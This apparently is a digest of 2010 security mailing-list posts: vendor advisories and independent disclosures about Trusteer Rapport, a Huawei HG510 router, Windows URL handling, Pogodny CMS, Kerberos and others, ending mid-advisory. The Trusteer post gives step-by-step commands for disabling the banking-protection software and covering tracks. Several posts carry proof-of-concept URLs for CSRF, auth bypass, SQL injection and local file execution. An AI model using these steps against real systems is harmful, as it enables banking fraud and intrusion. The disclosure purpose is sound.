Trusteer Rapport Security Circumvention
Hi, Trusteer is an innovative software to combat fraud, thus it's global uptake in the financial sector. Trusteer also seems quite adamant that their software is bullet-proof, their website pretty much sums it up. However, on having a closer look and some tinkering, I discovered a complete no brainer vector for circumventing Trusteer's security. I've tested this on various XP platforms successfuly, please feel free to notify the vendor as you wish and/or to publish whatever you feel appropriate under the circumstances. http://www.trusteer.com/solutions http://www.trusteer.com/product-0 http://www.trusteer.com/product/technology Trusteer Rapport locks down your browser once you connect to a sensitive website such as your bank. Any malicious software that tries to ride on the browser is left out of the locked down browser, and cannot access your sensitive information and transactions. Rapport also locks down communication between your browser and the bank, preventing any network-based attack from diverting traffic to fraudulent locations. The following illustrates how malware on entering a system by whichever means, and on detecting Trusteer's services, can easily (automated/scripted) disable Trusteer's security for whatever malevolent purposes. Step-by-step illustration, how to easily circumvent Trusteer's security. Firstly, disable Trusteer's service (RapportMgmtService.exe) in your active Hardware Profile. Trusteer doesn't protect this option, thus this is a good starting point for now. i.e. [HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_RAPPORTMGMTSERVICE\] "CSConfigFlags"=dword:0001 NOTE: This in fact disables Trusteer's service (RapportMgmtService.exe) in the Services.msc GUI i.e. Services.msc > "Rapport Management Service" > "Log On" > "Hardware Profile" > "Disabled" On the very next reboot, at least one reboot is required to disable the kernel driver (RapportPG.sys), Trusteer's service (RapportMgmtService.exe) should now be inactive/disabled, and thus you'll be able to rename Trusteer's now unprotected folders. i.e. Command Prompt C:\> cd \"Program Files" C:\> rename Trusteer TrusBeer NOTE: At this point the web browser's not protected by Trusteer, nor is Trusteer's software & system settings protected, thus pretty much open to your imagination. The following step is not required, especially seeing as Trusteer's service (RapportMgmtService.exe) was disabled previously in the active Hardware Profile. However, should you also wish to reconfigure Trusteer's now unprotected drivers & services to start manually, or even disable/delete completely, you may or may not have to reboot one more time, as the following step may need another reboot to take advantage of the previously now renamed unprotected folders in the previous step. i.e. Command Prompt C:\> sc config RapportMgmtService start= demand C:\> sc config RapportPG start= demand Should you wish to cover your tracks (you'll also have to clear event logs), rename Trusteer's home folder back to the original and restore the Hardware Profile registry entry. i.e. [HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_RAPPORTMGMTSERVICE\] "CSConfigFlags"=dword: i.e. Command Prompt C:\> cd \"Program Files" C:\> rename TrusBeer Trusteer Cheers Andrew Barkley (-_-)
Huawei HG510 CSRF, Auth Bypass, DoS
Hello, Huawei HG510 is a device offered by the Serbian telecom operator, to provide ADSL Internet connection. Administration of settings on this device is allowed only from local LAN network but not only from private IP address (eg 192.168.1.1) then You can access with public IP address (only from local LAN again). There is no CSRF protection so we can create malicious web pages and create some CSRF attacks. Is user is logged on his device we can change passwords or some another settings. POC: http://PUBLIC_IP_OF_USER/password.cgi?sysPassword=BASE64_NEW_PASSWORD When I testing this I found one strange behavior with /rebootinfo.cgi (reboot device script). Normaly for all this CSRF user must be logged into device web interface but if we request: http://PUBLIC_IP_OF_USER/rebootinfo.cgi, basic authentication is bypassed and device is rebooted. So we have CSRF + Authentication Bypass that lead to DoS of end user. If someone have any questions about this please contact me. Best regards, Ivan Markovic
IE address bar characters into a small feature
# # Securitylab.ir # # Application Info: # Name: Internet Explorer # Version: 8.0 # Vulnerability: IE address bar characters into a small feature My IE 8 on the address bar will automatically enter the url of the "\" (0x5c) transformed into "/" (0x2f) Example: www.securitylab.ir \a Converted to www.securitylab.ir/a Recently found that some phishing sites take advantage of this feature to bypass some security checks, it is hereby to be a mark # # Discoverd By: Pouya Daneshmand # Website: http://securitylab.ir # Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com ###
Insomnia : ISVA-100216.1 - Windows URL Handling Vulnerability
__ Insomnia Security Vulnerability Advisory: ISVA-100216.1 ___ Name: Windows URL Handling Vulnerability Released: 16 February 2010 Vendor Link: http://www.microsoft.com/ Affected Products: Windows 2000, Windows XP, Windows 2003, Windows Vista Original Advisory: http://www.insomniasec.com/advisories/ISVA-100216.1.htm Researcher: Brett Moore, Insomnia Security http://www.insomniasec.com ___ ___ Description ___ A flaw exists with the handling of malformed URL's passed through the ShellExeute() API. The vulnerability does not directly cause an issue within Windows itself however, applications that call the flawed API may be vulnerable to various attacks, one of which is shown in this report. ___ Details ___ The vulnerability is reached when the malformed URL contains #: and can be used to reference local files. Two such examples are shown here; acrobat://test/#://../../c:/windows/system32/calc.exe or anything://test/#://../../c:/windows/system32/calc.exe The results will be different dependant on where the URL is used and which OS platform is in use. Some examples are shown here; Start->Run Calc.exe is executed without prompt IE URL Bar or HREF User is prompted to execute calc.exe Word Document User is prompted to open acrobat link PDF Document Calc.exe is executed without prompt Firefox Firefox will not follow the URL Safari Calc.exe is executed without prompt ___ Potential Exploit ___ Safari will not access the local file through the standard file:// link, but will execute the local file through the malformed link. One method of executable delivery is through the onenote:// URL protocol if Microsoft OneNote is installed. OneNote will automatically open and process a onenote file shared over an SMB share. Any executables stored within the onenote file will be cached locally. This is done by downloading the embedded executables and storing them in a known location. C:/Users/[USERNAME]/AppData/Local/Microsoft/OneNote/12.0/OneNoteOfflineCache _Files/ This file can then be executed through the URL handling vulnerability leading to an automatic code execution issue through Safari. Obviously there are some requirements for this exploit; + the target user name must be known + Microsoft OneNote must be installed + SMB access out must be allowed ___ Solution ___ Microsoft have released a security update to address this issue; http://www.microsoft.com/technet/security/Bulletin/MS10-002.mspx http://www.microsoft.com/technet/security/Bulletin/MS10-007.mspx ___ Legals ___ The information is provided for research and educational purposes only. Insomnia Security accepts no liability in any form whatsoever for any direct or indirect damages associated with the use of this information. ___ Insomnia Security Vulnerability Advisory: ISVA-100216.1 ___
Pogodny CMS SQL vulnerabilities
# Exploit Title: [Pogodny CMS SQL injection]
# Date: [08.02.2010]
# Author: [Ariko-Security]
# Software Link: [http://www.cms.michalin.pl/moduly/pogodny/]
# Version: [ALL]
# Tested on: [freebsd / ubuntu]
{ Ariko-Security - Advisory #2/2/2010 } =
SQL injection vulnerability in Pogodny CMS
Vendor's Description of Software:
# http://www.cms.michalin.pl/moduly/pogodny/ (PL)
# vendor's DEMO http://www.cms.kr.media.pl/
Dork:
#pogodny CMS
Application Info:
# Name: pogodny CMS
# Versions: ALL
Vulnerability Info:
# Type: SQL injection Vulnerability
# Risk: High
Fix:
# N/A Vendor notified 08.02.2010
It was found that "pogodny CMS" does not validate properly the "id" parameter
value.
Solution:
# Input validation of "id" parameter should be corrected.
Vulnerability:
# http://[HOST]/?modul=niusy&id=61[Sqli]
Credit:
# Discoverd By: MG
# Website: http://Ariko-security.com
Ariko-Security
v...@ariko-security.com
tel.: +48512946012 (Mo-Fr 10.00-20.00 CET)
VMSA-2010-0003 ESX Service Console update for net-snmp
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - VMware Security Advisory Advisory ID: VMSA-2010-0003 Synopsis: ESX Service Console update for net-snmp Issue date:2010-02-16 Updated on:2010-02-16 (initial release of advisory) CVE numbers: CVE-2009-1887 - - 1. Summary Update for Service Console package net-snmp 2. Relevant releases VMware ESX 3.5 without patch ESX350-201002401-SG 3. Problem Description a. Service Console package net-snmp updated This patch updates the service console package for net-snmp, net-snmp-utils, and net-snmp-libs to version net-snmp-5.0.9-2.30E.28. This net-snmp update fixes a divide-by- zero flaw in the snmpd daemon. A remote attacker could issue a specially crafted GETBULK request that could cause the snmpd daemon to fail. This vulnerability was introduced by an incorrect fix for CVE-2008-4309. The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-1887 to this issue. Note: After installing the previous patch for net-snmp (ESX350-200901409-SG), running the snmpbulkwalk command with the parameter -CnX results in no output, and the snmpd daemon stops. The following table lists what action remediates the vulnerability (column 4) if a solution is available. VMware Product Running Replace with/ ProductVersion on Apply Patch = === = VirtualCenter any Windows not affected hosted * any any not affected ESXi any ESXi not affected ESX4.0 ESX not affected ESX3.5 ESX ESX350-201002401-SG ESX3.0.3 ESX affected, patch pending ESX2.5.5 ESX not affected * hosted products are VMware Workstation, Player, ACE, Server, Fusion. 4. Solution Please review the patch/release notes for your product and version and verify the md5sum of your downloaded file. ESX 3.5 --- ESX350-201002401-SG http://download3.vmware.com/software/vi/ESX350-201002401-SG.zip md5sum: a91428cb6bc2da794f581aefd5eef010 http://kb.vmware.com/kb/1017660 5. References CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1887 - - 6. Change log 2010-02-16 VMSA-2010-0003 Initial security advisory after release of patches for ESX 3.5 on 2010-02-16. - 7. Contact E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce This Security Advisory is posted to the following lists: * security-announce at lists.vmware.com * bugtraq at securityfocus.com * full-disclosure at lists.grok.org.uk E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055 VMware Security Center http://www.vmware.com/security VMware security response policy http://www.vmware.com/support/policies/security_response.html General support life cycle policy http://www.vmware.com/support/policies/eos.html VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html Copyright 2010 VMware Inc. All rights reserved. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.14 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkt66IQACgkQS2KysvBH1xmhuACbBL6u9x1WUt/wG2F45y2jjkHs WIIAn0tgLrLQGODyeK5pI8cPBIqsslNL =Fk9e -END PGP SIGNATURE-
MITKRB5-SA-2010-001 [CVE-2010-0283] krb5-1.7 KDC denial of service
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
MITKRB5-SA-2010-001
MIT krb5 Security Advisory 2010-001
Original release: 2010-02-16
Last update: 2010-02-16
Topic: krb5-1.7 KDC denial of service
CVE-2010-0283
krb5-1.7 KDC denial of service
CVSSv2 Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C/E:F/RL:O/RC:C
CVSSv2 Base Score: 7.8
Access Vector: Network
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact:Complete
CVSSv2 Temporal Score: 6.4
Exploitability: Functional
Remediation Level: Official Fix
Report Confidence: Confirmed
SUMMARY
===
Improper input validation in the KDC can cause an assertion failure
and process termination. A functional exploit exists, but is not
known to be publicly circulated. Releases prior to krb5-1.7 did not
contain the vulnerable code.
This is an implementation vulnerability in MIT krb5, and is not a
vulnerability in the Kerberos protocol.
IMPACT
==
An unauthenticated remote attacker can send an invalid request to a
KDC process that will cause it to crash due to an assertion failure,
creating a denial of service.
AFFECTED SOFTWARE
=
* KDC in MIT krb5-1.7 and later
* Prerelease (alpha test) code for krb5-1.8 is also vulnerable.
FIXES
=
* The upcoming krb5-1.7.2 release will contain a fix for this
vulnerability.
* The final krb5-1.8 release will contain a fix for this
vulnerability.
* For the krb5-1.7 and krb5-1.7.1 releases, apply the following patch:
diff --git a/src/kdc/do_as_req.c b/src/kdc/do_as_req.c
index 52fbda5..680e6a1 100644
- --- a/src/kdc/do_as_req.c
+++ b/src/kdc/do_as_req.c
@@ -137,6 +137,11 @@ process_as_req(krb5_kdc_req *request, krb5_data *req_pkt,
session_key.contents = 0;
enc_tkt_reply.authorization_data = NULL;
+if (request->msg_type != KRB5_AS_REQ) {
+status = "msg_type mismatch";
+errcode = KRB5_BADMSGTYPE;
+goto errout;
+}
errcode = kdc_make_rstate(&state);
if (errcode != 0) {
status = "constructing state";
diff --git a/src/kdc/do_tgs_req.c b/src/kdc/do_tgs_req.c
index 12180ff..c8cf692 100644
- --- a/src/kdc/do_tgs_req.c
+++ b/src/kdc/do_tgs_req.c
@@ -135,6 +135,8 @@ process_tgs_req(krb5_data *pkt, const krb5_fulladdr *from,
retval = decode_krb5_tgs_req(pkt, &request);
if (retval)
return retval;
+if (request->msg_type != KRB5_TGS_REQ)
+return KRB5_BADMSGTYPE;
/*
* setup_server_realm() sets up the global realm-specific data pointer.
diff --git a/src/kdc/fast_util.c b/src/kdc/fast_util.c
index d88e0cb..2639047 100644
- --- a/src/kdc/fast_util.c
+++ b/src/kdc/fast_util.c
@@ -384,7 +384,7 @@ krb5_error_code kdc_fast_handle_error
krb5_data *encoded_e_data = NULL;
memset(outer_pa, 0, sizeof(outer_pa));
- -if (!state->armor_key)
+if (!state || !state->armor_key)
return 0;
fx_error = *err;
fx_error.e_data.data = NULL;
This patch is also available at
http://web.mit.edu/kerberos/advisories/2010-001-patch.txt
A PGP-signed patch is available at
http://web.mit.edu/kerberos/advisories/2010-001-patch.txt.asc
* The above patch will apply to krb5-1.8 prerelease code if whitespace
is ignored.
REFERENCES
==
This announcement is posted at:
http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2010-001.txt
This announcement and related security advisories may be found on the
MIT Kerberos security advisory page at:
http://web.mit.edu/kerberos/advisories/index.html
The main MIT Kerberos web page is at:
http://web.mit.edu/kerberos/index.html
CVSSv2:
http://www.first.org/cvss/cvss-guide.html
http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2
CVE: CVE-2010-0283
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0283
ACKNOWLEDGMENTS
===
Thanks to Emmanuel Bouillon (NATO C3 Agency) for discovering and
reporting this vulnerability.
CONTACT
===
The MIT Kerberos Team security contact address is
. When sending sensitive information,
please PGP-encrypt it using the following key:
pub 2048R/8B8DF501 2010-01-15 [expires: 2011-02-01]
uid MIT Kerberos Team Security Contact
DETAILS
===
In new code introduced in the KDC for the krb5-1.7 release, code that
handles authorization data (handle_tgt_authdata()) contains a call to
assert() that ensures that the function arguments are consistent with
value of the msg_type field of the request that it is processing.
This assertion can fail because the msg_type can be inconsistent with
the ASN.1 tag that previously-executed code used to choose whether to
process the request as a request for initial tickets (AS-REQ) or as a
request for additional tickets (TGS-REQ).
REVISION HISTORY
2010-02-16 original release
Copyright (C) 2010 Massachusetts Institute of Technology
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.8 (SunOS)
iEYEARECAA
VUPEN Security Research - OpenOffice Word Document Processing Heap Overflow Vulnerabilities
VUPEN Security Research - OpenOffice.org Word Document Handling Heap Overflow Vulnerabilities http://www.vupen.com/english/research.php I. BACKGROUND - OpenOffice.org (OO.o or OOo), commonly known as OpenOffice, is an open source software application suite available for a number of different computer operating systems. It is distributed as free software and written using its own GUI toolkit. It supports the ISO/IEC standard OpenDocument Format (ODF) for data interchange as its default file format, as well as Microsoft Office formats among others. (Wikipedia) II. DESCRIPTION - VUPEN Vulnerability Research Team discovered critical vulnerabilities affecting OpenOffice.org. The first vulnerability is caused by a heap overflow error when processing malformed "sprmTDefTable" records in a Word document, which could be exploited by attackers to execute arbitrary code. The second vulnerability is caused by a heap overflow error when processing malformed "sprmTSetBrc" records in a Word document, which could be exploited by attackers to compromise a vulnerable system. III. AFFECTED PRODUCTS OpenOffice.org versions prior to 3.2 IV. Exploits - PoCs & Binary Analysis In-depth binary analysis of the vulnerabilities and exploits/PoCs have been released by VUPEN Security through the VUPEN Exploits & PoCs Service : http://www.vupen.com/exploits V. SOLUTION Upgrade to OpenOffice.org version 3.2 VI. CREDIT -- The vulnerabilities were discovered by Nicolas JOLY of VUPEN Security VII. ABOUT VUPEN Security - VUPEN is a leading IT security research company providing vulnerability management services to allow enterprises and organizations to eliminate vulnerabilities before they can be exploited, ensure security policy compliance and meaningfully measure and manage risks. VUPEN also provides research services for security vendors (antivirus, IDS, IPS,etc) to supplement their internal vulnerability research efforts and quickly develop vulnerability-based and exploit-based signatures, rules, and filters, and proactively protect their customers against potential threats. * VUPEN Vulnerability Notification Service: http://www.vupen.com/english/services * VUPEN Exploits and In-Depth Vulnerability Analysis: http://www.vupen.com/exploits VIII. REFERENCES -- http://www.vupen.com/english/advisories/2010/0366 http://www.openoffice.org/security/cves/CVE-2009-3301-3302.html http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3301 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3302 IX. DISCLOSURE TIMELINE --- 2009-11-03 - Vendor notified 2009-11-05 - Vendor response 2009-11-10 - Status update received 2009-12-21 - Status update received 2010-02-02 - Status update received 2010-02-12 - Coordinated public Disclosure
Re: Joomla (Jw_allVideos) Remote File Download Vulnerability
Hello! This is no longer relevant this extension is now at version 3.1 This was grab from a greez post
[ MDVSA-2010:038 ] maildrop
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:038 http://www.mandriva.com/security/ ___ Package : maildrop Date: February 16, 2010 Affected: Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: A vulnerability have been discovered and corrected in maildrop: main.C in maildrop 2.3.0 and earlier, when run by root with the -d option, uses the gid of root for execution of the .mailfilter file in a user's home directory, which allows local users to gain privileges via a crafted file (CVE-2010-0301). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0301 ___ Updated Packages: Corporate 4.0: f6b752753fa1a4e5fb050915672ca251 corporate/4.0/i586/maildrop-1.7.0-9.1.20060mlcs4.i586.rpm c30751bbbaa99dbe6bf787280ad1e163 corporate/4.0/i586/maildrop-devel-1.7.0-9.1.20060mlcs4.i586.rpm ac29677303ed83a59d852fc202d2b39e corporate/4.0/i586/maildrop-mysql-1.7.0-9.1.20060mlcs4.i586.rpm 1d0219502b50788dcfc6cf5651c5c4aa corporate/4.0/i586/maildrop-openldap-1.7.0-9.1.20060mlcs4.i586.rpm e1862d87d5f4003dbe722f33dc5f0d82 corporate/4.0/SRPMS/maildrop-1.7.0-9.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: cdf43f77a101efc865d290e4abd16c08 corporate/4.0/x86_64/maildrop-1.7.0-9.1.20060mlcs4.x86_64.rpm 373c837656ef6099862e8cd89df7dc69 corporate/4.0/x86_64/maildrop-devel-1.7.0-9.1.20060mlcs4.x86_64.rpm d5b96bb02e49413db3aefd660ee34203 corporate/4.0/x86_64/maildrop-mysql-1.7.0-9.1.20060mlcs4.x86_64.rpm 2c768ab880f838c7c3513ae6f8bcc962 corporate/4.0/x86_64/maildrop-openldap-1.7.0-9.1.20060mlcs4.x86_64.rpm e1862d87d5f4003dbe722f33dc5f0d82 corporate/4.0/SRPMS/maildrop-1.7.0-9.1.20060mlcs4.src.rpm Mandriva Enterprise Server 5: eee3e4db386d93afc826f636fa4d8f83 mes5/i586/maildrop-1.7.0-14.1mdvmes5.i586.rpm f11f173c784f5b13e103412ef1b80fbb mes5/i586/maildrop-devel-1.7.0-14.1mdvmes5.i586.rpm 41653a4ef502a213639fef75b731bd94 mes5/i586/maildrop-mysql-1.7.0-14.1mdvmes5.i586.rpm 58180f1d9d33f553dec2cced968aa60d mes5/i586/maildrop-openldap-1.7.0-14.1mdvmes5.i586.rpm c17caf47894ecd0d5b435b4ba767e561 mes5/SRPMS/maildrop-1.7.0-14.1mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: dd15808097dda7662345f5e54c597d45 mes5/x86_64/maildrop-1.7.0-14.1mdvmes5.x86_64.rpm ebb970d1a70d506119646edc096f8d3c mes5/x86_64/maildrop-devel-1.7.0-14.1mdvmes5.x86_64.rpm 44922a84217f505350c3c5e489ec8088 mes5/x86_64/maildrop-mysql-1.7.0-14.1mdvmes5.x86_64.rpm 15217994457847511ea2ae7291e8c556 mes5/x86_64/maildrop-openldap-1.7.0-14.1mdvmes5.x86_64.rpm c17caf47894ecd0d5b435b4ba767e561 mes5/SRPMS/maildrop-1.7.0-14.1mdvmes5.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLes4TmqjQ0CJFipgRAjrEAJ9oam8bmZsk0DjKC3TvrYclBeKelwCfSoJt Z4Oy5RxoCppnEo5V7zXM6Ew= =SMPt -END PGP SIGNATURE-
Enomaly ECP: Multiple vulnerabilities in VMcasting protocol & implementation.
Enomaly ECP: Multiple vulnerabilities in VMcasting protocol & implementation. Synopsis Enomaly ECP up to and including v3.0.4 is believed to contain an insecure silent update mechanism that could allow a remote attacker to execute arbitrary code as root, and to inject or modify VM workloads for execution within user environment or to replay older, insecure workloads. Both the Enomaly ECP implementation and the VMcasting protocol itself are believed to be vulnerable. Background Enomaly ECP is management software for virtual machines in cloud computing environments. Description Sam Johnston (http://samj.net/) of Australian Online Solutions (http://www.aos.net.au) reported that the vmfeed module, an insecure implementation of the insecure VMcasting protocol (http://www.vmcasting.org/) includes a silent update mechanism that downloads and executes Python code from Enomaly's corporate web server (http://enomaly.com/fileadmin/eggs/) over HTTP, without authentication or integrity checks. The code is triggered when the "application/python-egg" MIME type is encountered. The module also contains functionality for downloading workloads (virtual machines) from a feed which is itself retrieved over HTTP. While the VMcasting protocol (http://www.vmcasting.org/) describes a mechanism for digitally signing payloads, the mechanism is not implemented and there is no requirement to transfer feeds securely (e.g. over HTTPS). The implementation itself actively rejects URLs that do not start with "http" or "ftp" with an error. The module has the following feeds hardcoded: - Enomalism VMCasting Test Feed [http://enomalism.com/vmcast_appliances.php] - VMCasting Production Module Feed [http://enomalism.com/vmcast_modules.php] Impact Combined with the ability to intercept requests to Enomaly's corporate web server by other means such as ARP or DNS spoofing, or compromise the server itself or any intermediary server, it may be possible to execute arbitrary commands as the root user on any server requesting the feeds. It may also be possible for an attacker to run workloads of their choice, to modify existing workloads and to replay old, known-insecure workloads (even if signed). Workaround Resolve enomalism.com and enomaly.com to 127.0.0.1 in affected servers' hosts files or migrate to OpenECP which includes fixes for the vulnerabilities. Resolution There is no resolution at this time as the feature cannot be disabled. Vendor did not confirm whether subsequent/future releases [will] address the problem. History 2009-11-02 Open source distributions for Enomaly ECP removed from Internet. 2010-01-06 Email request for open source code Enomaly ECP code denied by CEO. 2010-02-03 Public discussion of vulnerability, verified in current source. 2010-02-03 Strategic Advisor & Board Member claims "Many of the items have been addressed in [Service Provider Edition and soon to be released High Assurance] editions. We will review your comments above for future inclusion into our product road map". Fails to identify which issues remain. 2010-02-09 OpenECP forked from Enomaly ECP, resolves vulnerabilities. 2010-02-09 Chief Technologist claims "ECP 3.0 is a significantly different product than 2.0 servicing different market needs. [...] Technically ECP2.0 was Enomalism 2.0, not the Elastic Computing platform." 2010-02-10 Changelogs showing common lineage are removed from Internet. 2010-02-?? http://src.enomaly.com is restored claiming "Our current platform, Enomaly ECP Service Provider Edition, is a completely different product." 2010-02-16 Vulnerability report released unverified.
Multiple Stored XSS in XOOPS 2.4.4 Admin Section
# Greetz to all Darkc0de ,AI,ICW, AH Memebers # Shoutz to r45c4l,j4ckh4x0r,silic0n,smith,baltazar,d3hydr8,FB1H2S, lowlz,Eberly,Sumit, # # Author: Beenu Arora # # Home : www.BeenuArora.com # # Email : beenudel1...@gmail.com # # Share the c0de! # # # Exploit: Multiple Stored XSS in XOOPS 2.4.4 Admin Section # # AppSite: www.xoops.org # # Tested Version : 2.4.4 # # Request: POST # # Sample URLs:-http://localhost/xoops/htdocs/modules/system/admin/groupperm.php # http://localhost/xoops/htdocs/modules/system/admin.php # #
[USN-901-1] Squid vulnerabilities
=== Ubuntu Security Notice USN-901-1 February 16, 2010 squid vulnerabilities CVE-2009-2855, CVE-2010-0308 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 Ubuntu 9.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: squid 2.5.12-4ubuntu2.5 Ubuntu 8.04 LTS: squid 2.6.18-1ubuntu3.1 Ubuntu 8.10: squid 2.7.STABLE3-1ubuntu2.2 Ubuntu 9.04: squid 2.7.STABLE3-4.1ubuntu1.1 Ubuntu 9.10: squid 2.7.STABLE6-2ubuntu2.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: It was discovered that Squid incorrectly handled certain auth headers. A remote attacker could exploit this with a specially-crafted auth header and cause Squid to go into an infinite loop, resulting in a denial of service. This issue only affected Ubuntu 8.10, 9.04 and 9.10. (CVE-2009-2855) It was discovered that Squid incorrectly handled certain DNS packets. A remote attacker could exploit this with a specially-crafted DNS packet and cause Squid to crash, resulting in a denial of service. (CVE-2010-0308) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.5.12-4ubuntu2.5.diff.gz Size/MD5: 248533 2454656350ab9b5410483e80a79128c6 http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.5.12-4ubuntu2.5.dsc Size/MD5: 675 fd131c2b5c03f21f497f31b69c2eae06 http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.5.12.orig.tar.gz Size/MD5: 1407261 1fc92afd1e858a51a2ebeba28cb76656 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid-common_2.5.12-4ubuntu2.5_all.deb Size/MD5: 203524 2455400b6eb3805ff0c1d2392068178f amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.5.12-4ubuntu2.5_amd64.deb Size/MD5: 844242 1afcf81c42b19962cdd5365bc5b6aa69 http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squid-cgi_2.5.12-4ubuntu2.5_amd64.deb Size/MD5: 106136 6ee8e11da7009f677e4fd30e9b047fe7 http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squidclient_2.5.12-4ubuntu2.5_amd64.deb Size/MD5:79628 d7ecffbbf1a63b895773920663c4aef4 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.5.12-4ubuntu2.5_i386.deb Size/MD5: 756608 79994c8370fc139cb5a551c4997c5870 http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squid-cgi_2.5.12-4ubuntu2.5_i386.deb Size/MD5: 104932 b8f0b74ce627f661023a323373993284 http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squidclient_2.5.12-4ubuntu2.5_i386.deb Size/MD5:78476 659174c97acab076331616e189f8c2fb powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.5.12-4ubuntu2.5_powerpc.deb Size/MD5: 839082 ee00e2ff00fd02a521e76acb9a53feda http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squid-cgi_2.5.12-4ubuntu2.5_powerpc.deb Size/MD5: 105826 d9a3baf35ddb005d446fdae238beffaa http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squidclient_2.5.12-4ubuntu2.5_powerpc.deb Size/MD5:79588 b96f5eb6f8b36b9e7984876f4fe87033 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.5.12-4ubuntu2.5_sparc.deb Size/MD5: 793288 e0229f7b2eeac59292bd1e72196f719b http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squid-cgi_2.5.12-4ubuntu2.5_sparc.deb Size/MD5: 105312 12b27303a17ddbf229563d664fc40f01 http://security.ubuntu.com/ubuntu/pool/universe/s/squid/squidclient_2.5.12-4ubuntu2.5_sparc.deb Size/MD5:79540 9d6e00216f18b6c151d0870b5f916b81 Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.6.18-1ubuntu3.1.diff.gz Size/MD5: 300822 a117f6c4aca9a0a1c592f446b7fe04fd http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.6.18-1ubuntu3.1.dsc Size/MD5: 806 3619367bb8824288a5f4c58a51ddc3b2 http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid_2.6.18.orig.tar.gz Size/MD5: 1725660 d7ff75f7b75ba7bc28ea453fe4b94434 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/s/squid/squid-common_2.6.18-1ubuntu3.1_all.deb Size/MD5: 482290 21e970822bc7e4f3f0eb62a82857dd62 amd64 architecture (Athlon64, Opteron, EM64T Xeon)
Chrome Password Manager Cross Origin Weakness (CVE-2010-0556)
Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Chrome Password Manager Cross Origin Weakness Release Date: 2010-02-15 Application: Google Chrome Web Browser Versions: 4.0.249.78, 3.0.195.38, and likely earlier Severity: Medium/Low Author: Timothy D. Morgan Vendor Status: Update Released [2] CVE Candidate: CVE-2010-0556 Reference: http://www.vsecurity.com/resources/advisory/20100215-1/ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description --- "Google Chrome is a web browser that runs web pages and applications with lightning speed." [1] Vulnerability Overview -- In mid-January, VSR identified a vulnerability in Google Chrome which could be used in phishing attacks in specific types of web sites. This issue may make it much easier to convince a victim to submit web application credentials to the attacker's site. Vulnerability Details - As with many modern browsers, Google Chrome implements a password manager to help users keep track of credentials used on various web sites. It may be used to store either HTTP authentication credentials or form-based credentials. The vulnerability surfaces in a situation where a user visits a web page which includes an embedded object, such as an image, 